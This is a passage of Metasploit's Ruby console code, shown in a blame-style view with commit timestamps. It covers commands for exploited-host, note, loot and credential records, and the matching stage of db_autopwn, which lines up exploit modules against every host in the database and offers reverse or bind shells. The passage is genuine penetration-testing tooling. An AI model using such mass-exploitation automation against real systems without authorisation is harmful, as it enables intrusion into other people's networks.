|
if args.delete "all"
|
|
|
|
inactive_ok = true
|
|
|
|
end
|
|
|
|
|
|
|
|
# Anything that wasn't an option is the thing to search for
|
|
|
|
search_param = args.shift
|
|
|
|
|
|
|
|
# Set up the place we're searching before dropping into the search loop
|
|
|
|
case search_term
|
|
|
|
when "host"
|
|
|
|
begin
|
|
|
|
rw = Rex::Socket::RangeWalker.new(search_param)
|
|
|
|
rescue
|
|
|
|
print_error "Invalid host parameter."
|
|
|
|
return
|
|
|
|
end
|
|
|
|
when "port"
|
|
|
|
if search_param =~ /([0-9]+)-([0-9]+)/
|
|
|
|
ports = Range.new($1,$2)
|
|
|
|
else
|
|
|
|
ports = Range.new(search_param,search_param)
|
|
|
|
end
|
|
|
|
when "service"
|
|
|
|
svcs = search_param.split(/[\s]*,[\s]*/)
|
2010-08-24 21:57:04 +00:00
|
|
|
end
|
2011-07-19 11:16:36 +00:00
|
|
|
|
|
|
|
exploited_returned = 0
|
2010-08-24 21:57:04 +00:00
|
|
|
framework.db.each_exploited_host(framework.db.workspace) do |eh|
|
2011-07-19 11:16:36 +00:00
|
|
|
unless search_param.nil?
|
|
|
|
next unless rw.include? eh.host.address
|
|
|
|
next unless !eh.service or ports.include? eh.service.port.to_s
|
|
|
|
next unless !eh.service or svcs.include? eh.service.name
|
2010-08-24 21:57:04 +00:00
|
|
|
end
|
2011-07-19 11:16:36 +00:00
|
|
|
|
2010-08-24 21:57:04 +00:00
|
|
|
if eh.service
|
|
|
|
print_status("Time: #{eh.updated_at} Host Info: host=#{eh.host.address} port=#{eh.service.port} proto=#{eh.service.proto} sname=#{eh.service.name} exploit=#{eh.name}")
|
|
|
|
else
|
|
|
|
print_status("Time: #{eh.updated_at} Host Info: host=#{eh.host.address} exploit=#{eh.name}")
|
|
|
|
end
|
|
|
|
exploited_returned += 1
|
|
|
|
end
|
|
|
|
print_status "Found #{exploited_returned} exploited host#{exploited_returned == 1 ? "" : "s"}."
|
|
|
|
end
|
|
|
|
|
2011-04-16 22:49:31 +00:00
|
|
|
def cmd_db_notes_help
|
2011-07-19 08:13:55 +00:00
|
|
|
print_line "Usage: db_notes [-h|--help] [-t <type1,type2>] [-n <data string>] [-a] [addr1 addr2 ...]"
|
2011-04-16 22:49:31 +00:00
|
|
|
print_line
|
2011-07-19 08:13:55 +00:00
|
|
|
print_line " -a,--add Add a note to the list of addresses, instead of listing"
|
2011-07-19 11:16:36 +00:00
|
|
|
print_line " -d,--delete Delete the hosts instead of searching"
|
2011-07-19 08:13:55 +00:00
|
|
|
print_line " -n,--note <data> Set the data for a new note (only with -a)"
|
2011-04-16 22:49:31 +00:00
|
|
|
print_line " -t <type1,type2> Search for a list of types"
|
|
|
|
print_line " -h,--help Show this help information"
|
2011-04-22 05:08:08 +00:00
|
|
|
print_line " -R,--rhosts Set RHOSTS from the results of the search"
|
2011-04-16 22:49:31 +00:00
|
|
|
print_line
|
2011-07-19 08:13:55 +00:00
|
|
|
print_line "Examples:"
|
2011-07-19 11:16:36 +00:00
|
|
|
print_line " db_notes --add -t apps -n 'winzip' 10.1.1.34 10.1.20.41"
|
2011-07-19 08:13:55 +00:00
|
|
|
print_line " db_notes -t smb.fingerprint 10.1.1.34 10.1.20.41"
|
|
|
|
print_line
|
2011-04-16 22:49:31 +00:00
|
|
|
end
|
|
|
|
|
2010-05-17 04:01:26 +00:00
|
|
|
def cmd_db_notes(*args)
|
2010-05-25 01:32:30 +00:00
|
|
|
return unless active?
|
2011-07-19 08:13:55 +00:00
|
|
|
mode = :search
|
|
|
|
data = nil
|
2009-11-06 21:08:34 +00:00
|
|
|
hosts = nil
|
|
|
|
types = nil
|
2011-04-22 05:08:08 +00:00
|
|
|
set_rhosts = false
|
2011-07-19 08:13:55 +00:00
|
|
|
hostlist = []
|
|
|
|
|
2009-11-06 21:08:34 +00:00
|
|
|
while (arg = args.shift)
|
|
|
|
case arg
|
2011-07-19 08:13:55 +00:00
|
|
|
when '-a','--add'
|
|
|
|
mode = :add
|
|
|
|
when '-d','--delete'
|
|
|
|
mode = :delete
|
|
|
|
when '-n','--note'
|
|
|
|
data = args.shift
|
|
|
|
if(!data)
|
|
|
|
print_error("Can't make a note with no data")
|
2009-11-06 21:08:34 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
when '-t'
|
|
|
|
typelist = args.shift
|
|
|
|
if(!typelist)
|
2011-07-19 08:13:55 +00:00
|
|
|
print_error("Invalid type list")
|
2009-11-06 21:08:34 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
types = typelist.strip().split(",")
|
2011-04-22 05:08:08 +00:00
|
|
|
when '-R','--rhosts'
|
|
|
|
set_rhosts = true
|
|
|
|
rhosts = []
|
2009-11-06 21:08:34 +00:00
|
|
|
when '-h','--help'
|
2011-04-16 22:49:31 +00:00
|
|
|
cmd_db_notes_help
|
2009-11-06 21:08:34 +00:00
|
|
|
return
|
2011-07-19 08:13:55 +00:00
|
|
|
else
|
|
|
|
hostlist << arg
|
2009-11-06 21:08:34 +00:00
|
|
|
end
|
|
|
|
|
2008-03-02 04:46:13 +00:00
|
|
|
end
|
2011-07-19 08:13:55 +00:00
|
|
|
case mode
|
|
|
|
when :add
|
|
|
|
if types.size != 1
|
|
|
|
print_error("Only one type allowed when adding notes")
|
2010-09-20 01:54:23 +00:00
|
|
|
end
|
2011-07-19 08:13:55 +00:00
|
|
|
type = types.first
|
|
|
|
hostlist.each { |addr|
|
|
|
|
host = framework.db.find_or_create_host(:host => addr)
|
|
|
|
break if not host
|
|
|
|
note = framework.db.find_or_create_note(:host => host, :type => type, :data => data)
|
|
|
|
break if not note
|
|
|
|
print_status("Time: #{note.created_at} Note: host=#{note.host.address} type=#{note.ntype} data=#{note.data}")
|
|
|
|
}
|
|
|
|
|
|
|
|
when :delete
|
|
|
|
if types.size != 1
|
|
|
|
print_error("Only one type allowed when deleting notes")
|
|
|
|
end
|
|
|
|
type = types.first
|
|
|
|
hostlist.each { |addr|
|
|
|
|
host = framework.db.workspace.hosts.find_by_address(addr)
|
|
|
|
next if not host
|
|
|
|
note = host.notes.find_by_ntype(type)
|
|
|
|
next if not note
|
|
|
|
print_status("Time: #{note.created_at} Note: host=#{note.host.address} type=#{note.ntype} data=#{note.data}")
|
|
|
|
note.destroy
|
|
|
|
}
|
|
|
|
|
|
|
|
when :search
|
|
|
|
framework.db.each_note(framework.db.workspace) do |note|
|
|
|
|
next if(hosts and (note.host == nil or hosts.index(note.host.address) == nil))
|
|
|
|
next if(types and types.index(note.ntype) == nil)
|
|
|
|
msg = "Time: #{note.created_at} Note:"
|
|
|
|
if (note.host)
|
|
|
|
host = note.host
|
|
|
|
msg << " host=#{note.host.address}"
|
|
|
|
if set_rhosts
|
|
|
|
# only unique addresses
|
|
|
|
rhosts << host.address unless rhosts.include?(host.address)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
if (note.service)
|
|
|
|
name = (note.service.name ? note.service.name : "#{note.service.port}/#{note.service.proto}")
|
|
|
|
msg << " service=#{name}"
|
|
|
|
end
|
|
|
|
msg << " type=#{note.ntype} data=#{note.data.inspect}"
|
|
|
|
print_status(msg)
|
2009-12-29 23:48:45 +00:00
|
|
|
end
|
2010-05-17 04:01:26 +00:00
|
|
|
end
|
2011-04-22 05:08:08 +00:00
|
|
|
|
|
|
|
# Finally, handle the case where the user wants the resulting list
|
|
|
|
# of hosts to go into RHOSTS.
|
|
|
|
set_rhosts_from_addrs(rhosts) if set_rhosts
|
2010-05-17 04:01:26 +00:00
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2011-04-16 22:49:31 +00:00
|
|
|
def cmd_db_loot_help
|
|
|
|
print_line "Usage: db_loot [-h|--help] [-a <addr1,addr2>] [-t <type1,type2>]"
|
|
|
|
print_line
|
|
|
|
print_line " -t <type1,type2> Search for a list of types"
|
|
|
|
print_line " -h,--help Show this help information"
|
2011-04-22 05:08:08 +00:00
|
|
|
print_line
|
2011-04-16 22:49:31 +00:00
|
|
|
end
|
2011-02-27 16:30:17 +00:00
|
|
|
|
|
|
|
def cmd_db_loot(*args)
|
|
|
|
return unless active?
|
|
|
|
hosts = nil
|
|
|
|
types = nil
|
|
|
|
while (arg = args.shift)
|
|
|
|
case arg
|
|
|
|
when '-a'
|
|
|
|
hostlist = args.shift
|
|
|
|
if(!hostlist)
|
|
|
|
print_status("Invalid host list")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
hosts = hostlist.strip().split(",")
|
|
|
|
when '-t'
|
|
|
|
typelist = args.shift
|
|
|
|
if(!typelist)
|
|
|
|
print_status("Invalid host list")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
types = typelist.strip().split(",")
|
|
|
|
when '-h','--help'
|
2011-04-16 22:49:31 +00:00
|
|
|
cmd_db_loot_help
|
2011-02-27 16:30:17 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
framework.db.each_loot(framework.db.workspace) do |loot|
|
|
|
|
next if(hosts and (loot.host == nil or hosts.index(loot.host.address) == nil))
|
|
|
|
next if(types and types.index(loot.ltype) == nil)
|
|
|
|
msg = "Time: #{loot.created_at} Loot:"
|
|
|
|
if (loot.host)
|
|
|
|
msg << " host=#{loot.host.address}"
|
|
|
|
end
|
|
|
|
if (loot.service)
|
|
|
|
name = (loot.service.name ? loot.service.name : "#{loot.service.port}/#{loot.service.proto}")
|
|
|
|
msg << "service=#{name}"
|
|
|
|
end
|
|
|
|
|
|
|
|
msg << " type=#{loot.ltype} name=#{loot.name} content=#{loot.content_type} info='#{loot.info}' path=#{loot.path}"
|
|
|
|
print_status(msg)
|
|
|
|
end
|
|
|
|
end
|
2006-05-30 15:44:48 +00:00
|
|
|
|
|
|
|
def cmd_db_add_port(*args)
|
2010-05-25 01:32:30 +00:00
|
|
|
return unless active?
|
2010-05-19 19:08:08 +00:00
|
|
|
if (not args or args.length < 2 or args.length > 4)
|
2009-12-31 01:27:04 +00:00
|
|
|
print_status("Usage: db_add_port <host> <port> [proto] [name]")
|
2006-05-30 15:44:48 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2009-12-31 01:27:04 +00:00
|
|
|
host = framework.db.find_or_create_host(:host => args[0])
|
2006-05-30 15:44:48 +00:00
|
|
|
return if not host
|
2010-01-11 19:18:49 +00:00
|
|
|
info = {
|
2009-12-31 01:27:04 +00:00
|
|
|
:host => host,
|
|
|
|
:port => args[1].to_i
|
|
|
|
}
|
|
|
|
info[:proto] = args[2].downcase if args[2]
|
|
|
|
info[:name] = args[3].downcase if args[3]
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-12-31 01:27:04 +00:00
|
|
|
service = framework.db.find_or_create_service(info)
|
2006-05-30 15:44:48 +00:00
|
|
|
return if not service
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2010-02-18 21:57:01 +00:00
|
|
|
print_status("Time: #{service.created_at} Service: host=#{service.host.address} port=#{service.port} proto=#{service.proto} state=#{service.state}")
|
2006-05-30 15:44:48 +00:00
|
|
|
end
|
2009-04-26 14:53:37 +00:00
|
|
|
|
2009-09-05 23:57:42 +00:00
|
|
|
def cmd_db_del_port(*args)
|
2010-05-25 01:32:30 +00:00
|
|
|
return unless active?
|
2009-09-05 23:57:42 +00:00
|
|
|
if (not args or args.length < 3)
|
|
|
|
print_status("Usage: db_del_port [host] [port] [proto]")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2010-02-18 06:40:38 +00:00
|
|
|
if framework.db.del_service(framework.db.workspace, args[0], args[2].downcase, args[1].to_i)
|
2009-09-05 23:57:42 +00:00
|
|
|
print_status("Service: host=#{args[0]} port=#{args[1].to_i} proto=#{args[2].downcase} deleted")
|
|
|
|
end
|
|
|
|
end
|
2006-05-30 15:44:48 +00:00
|
|
|
|
2010-08-18 00:58:20 +00:00
|
|
|
def cmd_db_add_cred(*args)
|
|
|
|
return unless active?
|
|
|
|
if (!args || args.length < 3)
|
|
|
|
print_status("Usage: db_add_cred [host] [port] [user] [pass] [type] [active]")
|
|
|
|
return
|
|
|
|
else
|
|
|
|
host,port,user,pass,ptype,active = args
|
|
|
|
cred = framework.db.find_or_create_cred(
|
|
|
|
:host => host,
|
|
|
|
:port => port,
|
|
|
|
:user => (user == "NULL" ? nil : user),
|
|
|
|
:pass => (pass == "NULL" ? nil : pass),
|
|
|
|
:ptype => ptype,
|
|
|
|
:active => (active == "false" ? false : true )
|
|
|
|
)
|
|
|
|
print_status("Time: #{cred.updated_at} Credential: host=#{cred.service.host.address} port=#{cred.service.port} proto=#{cred.service.proto} sname=#{cred.service.name} type=#{cred.ptype} user=#{cred.user} pass=#{cred.pass} active=#{cred.active}")
|
|
|
|
end
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2008-12-22 03:19:39 +00:00
|
|
|
def cmd_db_del_host(*args)
|
2010-05-25 01:32:30 +00:00
|
|
|
return unless active?
|
2008-12-22 03:19:39 +00:00
|
|
|
args.each do |address|
|
2010-02-18 06:40:38 +00:00
|
|
|
if framework.db.del_host(framework.db.workspace, address)
|
2008-12-22 03:19:39 +00:00
|
|
|
print_status("Host #{address} deleted")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
#
|
|
|
|
# A shotgun approach to network-wide exploitation
|
|
|
|
#
|
|
|
|
def cmd_db_autopwn(*args)
|
2010-05-25 01:32:30 +00:00
|
|
|
return unless active?
|
2006-09-17 22:07:52 +00:00
|
|
|
|
|
|
|
stamp = Time.now.to_f
|
|
|
|
vcnt = 0
|
|
|
|
rcnt = 0
|
|
|
|
mode = 0
|
|
|
|
code = :bind
|
2008-11-18 22:01:15 +00:00
|
|
|
mjob = 5
|
|
|
|
regx = nil
|
2009-12-23 03:53:16 +00:00
|
|
|
minrank = nil
|
2010-03-24 00:11:21 +00:00
|
|
|
maxtime = 120
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2008-11-18 22:01:15 +00:00
|
|
|
port_inc = []
|
|
|
|
port_exc = []
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2006-12-10 08:21:52 +00:00
|
|
|
targ_inc = []
|
|
|
|
targ_exc = []
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
args.push("-h") if args.length == 0
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2006-09-17 22:07:52 +00:00
|
|
|
while (arg = args.shift)
|
|
|
|
case arg
|
|
|
|
when '-t'
|
|
|
|
mode |= PWN_SHOW
|
|
|
|
when '-x'
|
|
|
|
mode |= PWN_XREF
|
|
|
|
when '-p'
|
|
|
|
mode |= PWN_PORT
|
|
|
|
when '-e'
|
|
|
|
mode |= PWN_EXPL
|
|
|
|
when '-s'
|
2008-11-18 22:01:15 +00:00
|
|
|
mode |= PWN_SING
|
|
|
|
when '-q'
|
|
|
|
mode |= PWN_SLNT
|
2009-12-03 01:36:17 +00:00
|
|
|
when '-v'
|
|
|
|
mode |= PWN_VERB
|
2008-11-18 22:01:15 +00:00
|
|
|
when '-j'
|
|
|
|
mjob = args.shift.to_i
|
2006-09-17 22:07:52 +00:00
|
|
|
when '-r'
|
|
|
|
code = :conn
|
|
|
|
when '-b'
|
|
|
|
code = :bind
|
2006-12-10 08:21:52 +00:00
|
|
|
when '-I'
|
2010-05-17 04:35:33 +00:00
|
|
|
tmpopt = OptAddressRange.new('TEMPRANGE', [ true, '' ])
|
|
|
|
range = args.shift
|
|
|
|
if not tmpopt.valid?(range)
|
|
|
|
print_error("Invalid range for -I")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
targ_inc << Rex::Socket::RangeWalker.new(tmpopt.normalize(range))
|
2006-12-10 08:21:52 +00:00
|
|
|
when '-X'
|
2010-05-17 04:35:33 +00:00
|
|
|
tmpopt = OptAddressRange.new('TEMPRANGE', [ true, '' ])
|
|
|
|
range = args.shift
|
|
|
|
if not tmpopt.valid?(range)
|
|
|
|
print_error("Invalid range for -X")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
targ_exc << Rex::Socket::RangeWalker.new(tmpopt.normalize(range))
|
2008-11-18 22:01:15 +00:00
|
|
|
when '-PI'
|
2010-03-28 23:02:28 +00:00
|
|
|
port_inc = Rex::Socket.portspec_to_portlist(args.shift)
|
2008-11-18 22:01:15 +00:00
|
|
|
when '-PX'
|
2010-03-28 23:02:28 +00:00
|
|
|
port_exc = Rex::Socket.portspec_to_portlist(args.shift)
|
2008-11-18 22:01:15 +00:00
|
|
|
when '-m'
|
|
|
|
regx = args.shift
|
2009-12-23 03:53:16 +00:00
|
|
|
when '-R'
|
|
|
|
minrank = args.shift
|
2010-03-24 00:11:21 +00:00
|
|
|
when '-T'
|
|
|
|
maxtime = args.shift.to_f
|
2009-10-28 18:04:50 +00:00
|
|
|
when '-h','--help'
|
2006-09-17 22:07:52 +00:00
|
|
|
print_status("Usage: db_autopwn [options]")
|
2008-11-18 22:01:15 +00:00
|
|
|
print_line("\t-h Display this help text")
|
|
|
|
print_line("\t-t Show all matching exploit modules")
|
|
|
|
print_line("\t-x Select modules based on vulnerability references")
|
|
|
|
print_line("\t-p Select modules based on open ports")
|
|
|
|
print_line("\t-e Launch exploits against all matched targets")
|
|
|
|
# print_line("\t-s Only obtain a single shell per target system (NON-FUNCTIONAL)")
|
|
|
|
print_line("\t-r Use a reverse connect shell")
|
2009-10-04 19:48:48 +00:00
|
|
|
print_line("\t-b Use a bind shell on a random port (default)")
|
2008-12-02 02:03:22 +00:00
|
|
|
print_line("\t-q Disable exploit module output")
|
2009-12-23 03:53:16 +00:00
|
|
|
print_line("\t-R [rank] Only run modules with a minimal rank")
|
2008-11-18 22:01:15 +00:00
|
|
|
print_line("\t-I [range] Only exploit hosts inside this range")
|
|
|
|
print_line("\t-X [range] Always exclude hosts inside this range")
|
|
|
|
print_line("\t-PI [range] Only exploit hosts with these ports open")
|
|
|
|
print_line("\t-PX [range] Always exclude hosts with these ports open")
|
|
|
|
print_line("\t-m [regex] Only run modules whose name matches the regex")
|
2010-03-24 00:11:21 +00:00
|
|
|
print_line("\t-T [secs] Maximum runtime for any exploit in seconds")
|
2006-09-17 22:07:52 +00:00
|
|
|
print_line("")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2009-12-23 03:53:16 +00:00
|
|
|
minrank = minrank || framework.datastore['MinimumRank'] || 'manual'
|
2009-12-10 15:12:59 +00:00
|
|
|
if ! RankingName.values.include?(minrank)
|
2009-12-09 23:07:58 +00:00
|
|
|
print_error("MinimumRank invalid! Possible values are (#{RankingName.sort.map{|r|r[1]}.join("|")})")
|
2009-12-09 01:54:20 +00:00
|
|
|
wlog("MinimumRank invalid, ignoring", 'core', LEV_0)
|
2009-12-09 23:07:58 +00:00
|
|
|
return
|
2009-12-09 01:54:20 +00:00
|
|
|
else
|
|
|
|
minrank = RankingName.invert[minrank]
|
|
|
|
end
|
|
|
|
|
2009-12-03 01:36:17 +00:00
|
|
|
# Default to quiet mode
|
|
|
|
if (mode & PWN_VERB == 0)
|
|
|
|
mode |= PWN_SLNT
|
|
|
|
end
|
|
|
|
|
|
|
|
matches = {}
|
|
|
|
refmatches = {}
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
# Pre-allocate a list of references and ports for all exploits
|
|
|
|
mrefs = {}
|
|
|
|
mports = {}
|
|
|
|
mservs = {}
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2010-03-18 18:26:53 +00:00
|
|
|
# A list of jobs we spawned and need to wait for
|
|
|
|
autopwn_jobs = []
|
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
[ [framework.exploits, 'exploit' ], [ framework.auxiliary, 'auxiliary' ] ].each do |mtype|
|
|
|
|
mtype[0].each_module do |modname, mod|
|
|
|
|
o = mod.new
|
2006-09-17 22:07:52 +00:00
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
if(mode & PWN_XREF != 0)
|
|
|
|
o.references.each do |r|
|
2009-12-03 01:36:17 +00:00
|
|
|
next if r.ctx_id == 'URL'
|
2009-12-11 20:21:18 +00:00
|
|
|
ref = r.ctx_id + "-" + r.ctx_val
|
|
|
|
ref.upcase!
|
2009-12-03 01:36:17 +00:00
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
mrefs[ref] ||= {}
|
|
|
|
mrefs[ref][o.fullname] = o
|
|
|
|
end
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
if(mode & PWN_PORT != 0)
|
|
|
|
if(o.datastore['RPORT'])
|
|
|
|
rport = o.datastore['RPORT']
|
|
|
|
mports[rport.to_i] ||= {}
|
|
|
|
mports[rport.to_i][o.fullname] = o
|
|
|
|
end
|
2009-12-03 01:36:17 +00:00
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
if(o.respond_to?('autofilter_ports'))
|
|
|
|
o.autofilter_ports.each do |rport|
|
|
|
|
mports[rport.to_i] ||= {}
|
|
|
|
mports[rport.to_i][o.fullname] = o
|
|
|
|
end
|
|
|
|
end
|
2009-12-03 01:36:17 +00:00
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
if(o.respond_to?('autofilter_services'))
|
|
|
|
o.autofilter_services.each do |serv|
|
|
|
|
mservs[serv] ||= {}
|
|
|
|
mservs[serv][o.fullname] = o
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
2009-12-03 01:36:17 +00:00
|
|
|
|
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
begin
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
framework.db.hosts.each do |host|
|
|
|
|
xhost = host.address
|
|
|
|
next if (targ_inc.length > 0 and not range_include?(targ_inc, xhost))
|
|
|
|
next if (targ_exc.length > 0 and range_include?(targ_exc, xhost))
|
2009-12-03 01:36:17 +00:00
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
if(mode & PWN_VERB != 0)
|
|
|
|
print_status("Scanning #{xhost} for matching exploit modules...")
|
|
|
|
end
|
2006-09-17 22:07:52 +00:00
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
#
|
|
|
|
# Match based on vulnerability references
|
|
|
|
#
|
|
|
|
if (mode & PWN_XREF != 0)
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
host.vulns.each do |vuln|
|
2009-10-28 18:04:50 +00:00
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
# Faster to handle these here
|
|
|
|
serv = vuln.service
|
|
|
|
xport = xprot = nil
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
if(serv)
|
|
|
|
xport = serv.port
|
|
|
|
xprot = serv.proto
|
2009-11-06 16:01:24 +00:00
|
|
|
end
|
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
vuln.refs.each do |ref|
|
|
|
|
mods = mrefs[ref.name.upcase] || {}
|
|
|
|
mods.each_key do |modname|
|
|
|
|
mod = mods[modname]
|
|
|
|
next if minrank and minrank > mod.rank
|
|
|
|
next if (regx and mod.fullname !~ /#{regx}/)
|
|
|
|
|
|
|
|
if(xport)
|
|
|
|
next if (port_inc.length > 0 and not port_inc.include?(serv.port.to_i))
|
|
|
|
next if (port_exc.length > 0 and port_exc.include?(serv.port.to_i))
|
|
|
|
else
|
|
|
|
if(mod.datastore['RPORT'])
|
|
|
|
next if (port_inc.length > 0 and not port_inc.include?(mod.datastore['RPORT'].to_i))
|
|
|
|
next if (port_exc.length > 0 and port_exc.include?(mod.datastore['RPORT'].to_i))
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2009-09-11 15:32:23 +00:00
|
|
|
next if (regx and e.fullname !~ /#{regx}/)
|
2009-12-03 01:36:17 +00:00
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
mod.datastore['RPORT'] = xport if xport
|
|
|
|
mod.datastore['RHOST'] = xhost
|
2009-12-03 15:26:30 +00:00
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
filtered = false
|
2009-12-03 15:26:30 +00:00
|
|
|
begin
|
2009-12-11 21:46:44 +00:00
|
|
|
::Timeout.timeout(2, ::RuntimeError) do
|
2009-12-11 20:21:18 +00:00
|
|
|
filtered = true if not mod.autofilter()
|
|
|
|
end
|
2009-12-03 15:26:30 +00:00
|
|
|
rescue ::Interrupt
|
|
|
|
raise $!
|
2009-12-11 20:21:18 +00:00
|
|
|
rescue ::Timeout::Error
|
|
|
|
filtered = true
|
2009-12-03 15:26:30 +00:00
|
|
|
rescue ::Exception
|
2009-12-11 20:21:18 +00:00
|
|
|
filtered = true
|
2009-12-03 15:26:30 +00:00
|
|
|
end
|
2009-12-11 20:21:18 +00:00
|
|
|
next if filtered
|
2009-12-03 01:36:17 +00:00
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
matches[[xport,xprot,xhost,mod.fullname]]=true
|
|
|
|
refmatches[[xport,xprot,xhost,mod.fullname]] ||= []
|
|
|
|
refmatches[[xport,xprot,xhost,mod.fullname]] << ref.name
|
2006-09-17 22:07:52 +00:00
|
|
|
end
|
2009-12-11 20:21:18 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
2009-10-28 18:04:50 +00:00
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
#
|
|
|
|
# Match based on open ports
|
|
|
|
#
|
|
|
|
if (mode & PWN_PORT != 0)
|
|
|
|
host.services.each do |serv|
|
|
|
|
next if not serv.host
|
2010-02-05 15:43:24 +00:00
|
|
|
next if (serv.state != ServiceState::Open)
|
2009-12-11 20:21:18 +00:00
|
|
|
|
|
|
|
xport = serv.port.to_i
|
|
|
|
xprot = serv.proto
|
|
|
|
xname = serv.name
|
|
|
|
|
|
|
|
next if xport == 0
|
|
|
|
|
|
|
|
next if (port_inc.length > 0 and not port_inc.include?(xport))
|
|
|
|
next if (port_exc.length > 0 and port_exc.include?(xport))
|
|
|
|
|
|
|
|
mods = mports[xport.to_i] || {}
|
|
|
|
|
|
|
|
mods.each_key do |modname|
|
|
|
|
mod = mods[modname]
|
|
|
|
next if minrank and minrank > mod.rank
|
|
|
|
next if (regx and mod.fullname !~ /#{regx}/)
|
|
|
|
mod.datastore['RPORT'] = xport
|
|
|
|
mod.datastore['RHOST'] = xhost
|
|
|
|
|
|
|
|
filtered = false
|
|
|
|
begin
|
2009-12-11 21:46:44 +00:00
|
|
|
::Timeout.timeout(2, ::RuntimeError) do
|
2009-12-11 20:21:18 +00:00
|
|
|
filtered = true if not mod.autofilter()
|
|
|
|
end
|
|
|
|
rescue ::Interrupt
|
|
|
|
raise $!
|
|
|
|
rescue ::Exception
|
|
|
|
filtered = true
|
|
|
|
end
|
|
|
|
|
|
|
|
next if filtered
|
|
|
|
matches[[xport,xprot,xhost,mod.fullname]]=true
|
|
|
|
end
|
|
|
|
|
|
|
|
mods = mservs[xname] || {}
|
|
|
|
mods.each_key do |modname|
|
|
|
|
mod = mods[modname]
|
|
|
|
next if minrank and minrank > mod.rank
|
|
|
|
next if (regx and mod.fullname !~ /#{regx}/)
|
|
|
|
mod.datastore['RPORT'] = xport
|
|
|
|
mod.datastore['RHOST'] = xhost
|
|
|
|
|
|
|
|
filtered = false
|
|
|
|
begin
|
2009-12-11 21:46:44 +00:00
|
|
|
::Timeout.timeout(2, ::RuntimeError) do
|
2009-12-11 20:21:18 +00:00
|
|
|
filtered = true if not mod.autofilter()
|
|
|
|
end
|
|
|
|
rescue ::Interrupt
|
|
|
|
raise $!
|
|
|
|
rescue ::Exception
|
|
|
|
filtered = true
|
2009-11-06 16:01:24 +00:00
|
|
|
end
|
2009-12-11 20:21:18 +00:00
|
|
|
|
|
|
|
next if filtered
|
|
|
|
matches[[xport,xprot,xhost,mod.fullname]]=true
|
2006-09-17 22:07:52 +00:00
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
end
|
2006-09-17 22:07:52 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2009-12-11 20:21:18 +00:00
|
|
|
rescue ::Exception => e
|
|
|
|
print_status("ERROR: #{e.class} #{e} #{e.backtrace}")
|
|
|
|
return
|
|
|
|
end
|
2006-09-17 22:07:52 +00:00
|
|
|
|
|
|
|
if (mode & PWN_SHOW != 0)
|
2009-12-03 01:36:17 +00:00
|
|
|
print_status("Analysis completed in #{(Time.now.to_f - stamp).to_i} seconds (#{vcnt} vulns / #{rcnt} refs)")
|
2009-12-03 15:26:30 +00:00
|
|
|
print_status("")
|
2009-12-03 01:36:17 +00:00
|
|
|
print_status("=" * 80)
|
|
|
|
print_status(" " * 28 + "Matching Exploit Modules")
|
|
|
|
print_status("=" * 80)
|
|
|
|
|
|
|
|
matches.each_key do |xref|
|
|
|
|
mod = nil
|
|
|
|
if ((mod = framework.modules.create(xref[3])) == nil)
|
|
|
|
print_status("Failed to initialize #{xref[3]}")
|
|
|
|
next
|
|
|
|
end
|
|
|
|
|
|
|
|
if (mode & PWN_SHOW != 0)
|
|
|
|
tport = xref[0] || mod.datastore['RPORT']
|
|
|
|
if(refmatches[xref])
|
|
|
|
print_status(" #{xref[2]}:#{tport} #{xref[3]} (#{refmatches[xref].join(", ")})")
|
|
|
|
else
|
|
|
|
print_status(" #{xref[2]}:#{tport} #{xref[3]} (port match)")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
print_status("=" * 80)
|
|
|
|
print_status("")
|
|
|
|
print_status("")
|
